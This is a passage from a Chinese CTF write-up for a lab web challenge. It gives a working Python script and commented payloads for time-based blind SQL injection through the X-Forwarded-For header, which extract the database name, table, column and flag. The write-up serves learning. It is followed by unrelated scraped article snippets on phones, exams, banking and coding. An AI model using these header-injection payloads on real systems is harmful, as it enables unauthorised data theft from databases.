2.Who are you?

根据提示:


我要把攻击我的人都记录db中去!

记录了我们的iP,由此猜测应该是HTTP头注入,获取IP则是通过头中的X-FORWADED-FOR来获取的

相关知识:http://www.cnblogs.com/softidea/p/5325079.html

由此需要写代码来完成相关操作

#!/usr/bin/python
#coding=utf-8
#Author = One

import requests

def request(sql):
	url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php"
	payload = {
		"Host":"ctf5.shiyanbar.com",
		"X-FORWARDED-FOR":sql,
		"User-Agent":"Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0",
		"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
		"Accept-Language":"zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3",
		"ccept-Encoding":"gzip, deflate",
		"Cookie":"Hm_lvt_34d6f7353ab0915a4c582e4516dffbc3=1497371533,1499754629; Hm_cv_34d6f7353ab0915a4c582e4516dffbc3=1*visitor*80971%2CnickName%3AOne; _ga=GA1.2.1839998664.1499754828; _gid=GA1.2.1200124816.1499754828; Hm_lpvt_34d6f7353ab0915a4c582e4516dffbc3=1499764932; PHPSESSID=10gs5psspg8sh6d0unein5uak0",
		"Connection":"keep-alive"
	}
	try:
		requests.get(url,headers=payload,timeout=4)
		return 0
	except:
		return 1

def violent(strs):
	keys = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXY}Z{_"
	n = 0
	key = ""
	for i in range(1,35):
		for j in keys: 
			sql = "127.0.0.1‘ and case when substring(("+strs+") from "+str(i)+" for 1)=‘"+j+"‘ then sleep(5) else 0 end and ‘1‘=‘1"
			result = request(sql)
			if(result == 1):
				key += j
				break
			else:
				n += 1
		if(n == 65):
			return key
			break
		else:
			n = 0

def main():
	#猜解数据库名
	dbn_sql = "select database()"
	db_name = violent(dbn_sql)
	print "数据库名:"+db_name
	#猜解数据库中表名
	#tbn_sql1 = "select table_name from information_schema.tables where table_schema = ‘Web4‘ order by table_name asc limit 1"
	#print violent(tbn_sql1)
	tbn_sql2 = "select table_name from information_schema.tables where table_schema = ‘"+db_name+"‘ order by table_name desc limit 1"
	tb_name = violent(tbn_sql2)
	print "需要查看的表名:"+tb_name
	#猜解表中字段名
	cln_sql = "select column_name from information_schema.columns where table_name = ‘"+tb_name+"‘"
	col_name = violent(cln_sql)
	print "表中的字段名:"+col_name
	#猜解记录
	key_sql = "select "+col_name+" from "+tb_name
	print violent(key_sql)

if __name__ == ‘__main__‘:
	main()

#判断数据库长度127.0.0.1‘ and case when length(database())=4 then sleep(5) else 1 end and ‘1‘=‘1
#判断数据库名字127.0.0.1‘ and case when (ascii(substring((select database()) from 1 for 1))&1)=1 then sleep(5) else 1 end and ‘1‘=‘1
#判断数据表数量127.0.0.1‘ and case when (select count(table_name) from information_schema.tables where table_schema = ‘web4‘)=4 then sleep(5) else 1 end and ‘1‘=‘1
#判断数据库表名长度127.0.0.1‘ and case when (select length(table_name) from information_schema.tables where table_schema = ‘Web4‘ order by table_name asc limit 1)
#判断数据库表名127.0.0.1‘ and case when (select table_name from information_schema.tables where table_schema = ‘Web4‘ order by table_name asc limit 1)
#判断表中字段数量127.0.0.1‘ and case when (select count(column_name) from information_schema.columns where table_name = ‘flag‘)
#判断表中字段名长度127.0.0.1‘ and case when (select length(column_name) from information_schema.columns where table_name = ‘flag‘)
#判断表中字段名127.0.0.1‘ and case when (select column_name from information_schema.columns where table_name = ‘flag‘)
#判断记录数量127.0.0.1‘ and case when (select count(flag) from flag)
#判断记录长度127.0.0.1‘ and case when (select length(flag) from flag)

代码写的比较菜...也是看了别人写的一些write up参考的,跑出来的结果要放在ctf{}中,如果不对,多跑几遍
本人也是初学者,有什么错误的地方,希望大家指出,谢谢!
时间: 2024-10-20 18:36:38

2.Who are you?的相关文章

三支一扶成绩什么时候出来?

三支一扶考试成绩是各位考生在参加了三支一扶考试之后关注的第一件事,那么在三支一扶考试之后到底三支一扶成绩什么时候出来[gwy.kaoshib.com/szyf/cjcx/52863.html]呢?今天小编就为大家介绍一下. 三支一扶成绩什么时候出来这个问题使参加完考试之后的一个重大问题,三支一扶成绩一般会在考试进行的半个月之后进行考试成绩的发布,但是也有一些省份会在考试结束之后的第二天发布此次的考试成绩. 因为三支一扶考试不是统一进行考试,考试时间不一样,当然三支一扶成绩什么时候出来的时间也就不

苹果三星新“机皇”遇冷,国产手机该高兴吗?

几年前这还是让人不敢想象的情景:安卓与iOs两大阵营的"机皇"---Note8和iPhoneX,在中国"手机春晚"的年度压轴表演,就真的仅仅是"表演"而已.整个中国手机产业界完全是冷眼旁观.这旁观不是羡慕和嫉妒,而是真的有点漠不关心. 原因简单明了:Note8与iPhoneX刚一发布就已经被所有人认定,在中国市场没有前途.而主流消费者几乎可以肯定地说,将会在一阵感慨之后立刻转身投入国产手机的怀抱. 手机市场的竞争,无非 硬件性价比 + 软件生态

三百六十度全景图如何拍摄?

三百六十度全景图如何拍摄?随着全景技术的发展,全景拍摄也成为了一种十分新潮的摄影方式.全景摄影也有很多学问,而且随着全景照片的用途越来越多,拍摄全景的设备也越来越多.今天我们就介绍几种十分另类的360全景图拍摄方法,这些酷雷曼360全景图拍摄方法让你大开眼界. 工具/原料 相机 鱼眼镜头 云台 三角支架 方法/步骤 1 吊锤辅助360全景图拍摄方法 吊线保证拍摄时相机以节点旋转,使用吊线进行全景拍摄线不要太长,50CM以内比较容易控制,有时也到一米多在胸口位置进行拍摄,重锤容易晃动,很难对准.吊

张书乐:BATJ联姻银行:智慧银行会来的更猛烈些吗?

几乎一夜之间,一直有些势成水火的主流互联网金融平台,都分别和四大国有银行牵上了手. 2017年3月28日,阿里巴巴集团.蚂蚁金服集团和中国建设银行签署了三方战略合作协议:6月16日,工商银行牵手京东刘强东进行全面合作,6月20日,百度与农业银行宣布达成战略合作:6月22日,腾讯则下了个"双黄蛋",同一天与中国银行和华夏银行均签战略合作协议-- 至此,互联网(不限于金融)领域俗称的BATJ(百度.阿里.腾讯.京东)与四大国有银行工.农.中.建,均结成了互助对子. 科技金融还是金融科技,这

如何上传代码到github?

如何上传代码到github? 首先你需要一个github账号,所有还没有的话先去注册吧! https://github.com/ 我们使用git需要先安装git工具,这里给出下载地址,下载后一路直接安装即可: https://git-for-windows.github.io/ 1.进入Github首页,点击New repository新建一个项目  2.填写相应信息后点击create即可 Repository name: 仓库名称 Description(可选): 仓库描述介绍 Public,

张书乐:无人便利店 有风无浪新蓝海,怎么闯?

进店扫码获得电子入场码,选好货物后自动结算,节约下排队和结账的时间,快速离开没有一个售货员的便利店.这样颇有点小科幻的场景,在当下中国已经出现. "F5未来商店"对外宣称,获创新工场3000万元A+轮投资:国内首个商用可规模化复制的24小时无人便利店"缤果盒子"宣布完成A轮系列融资,融资额超过1亿元:阿里首家无人超市"淘咖啡"也在7月第二届淘宝造物节上与首次亮相. 又一个互联网+的大风口来临了吗?有可能成为颠覆实体零售的新势力吗?或许答案是,想得

产品规划:如何规划代金券系统?

ps:此代金券系统的规划是建立在SDK的产品上 一.代金券需求 近期,公司的游戏产品需要做折扣系统,目的提高付费率.简单来说就是玩家购买游戏商品获得一定的折扣. 二.关于折扣形式 这里折扣形式可以有: 直接在产品进行打折: 发放活动券: 提供充值返利: 代币等. 1.直接在产品进行折扣处理 这种方法最为简单,无论是技术实现还是产品角度都是最方便的,但是用户体验感也是最不好的.用户很直观看到有打折,打折仅仅打折并没有拿到实际的东西,用户得不到真实的感知质量,这就是用户感知性: 2.发放活动券形式

DEDE5.7如何制作网站地图?

DEDE用的人很多,可能大家在使用的过程中会碰到一些问 题,这很正常的,今天我们来讲讲DEDE5.7如何制作网站地图,其实网站地图分两种,一种做给网友看的,方便网友可以方便地找到自己想浏览的内容,另外 一种是做给搜索引擎蜘蛛看,方便蜘蛛在你网站上面抓取内容.    当然,我们这里讲的主要是针对蜘蛛的,因为DEDE默认的就有针对用户的网站地图,主要是以栏目的形式展现,这个可以在DEDE后台自行生成.其实大家印象当中的网站地图是XML格式的,一般命名成sitemap.xml,接下来进入正题.    

苹果不再“雁过拔毛”的背后:利益博弈下谁是赢家?

自从库克成为苹果大当家后,苹果似乎就一直奔着利润一股脑地扎进去了.iPhone万年不变样,就连有所改变的iPhone X在售价上也是"穷凶极恶",吃相极其难看.而在今年4月份腾讯微信官方发布通告,更是将苹果推上风口浪尖.微信官方表示,由于受苹果公司新规定影响,iOS 平台的微信客户端关闭公众号打赏功能. 至于微博问答.知乎问答.今日头条及众多直播平台等在内,都逃不过苹果的"雁过拔毛"--苹果认为应用上的打赏属于"内购"行为,去抽取30%的分成.但

Android程序能够构建和运行,但是报以下报错,为什么?

安卓程序写完之后能够构建和运行,但是会报以下的错误.不知道原因为何?求大神解答. 网上说的是混淆编译的原因,不过程序没有开启混淆编译. Error:warning: Ignoring InnerClasses attribute for an anonymous inner class Error:(com.alipay.android.phone.mrpc.core.c) that doesn't come with an Error:associated EnclosingMethod at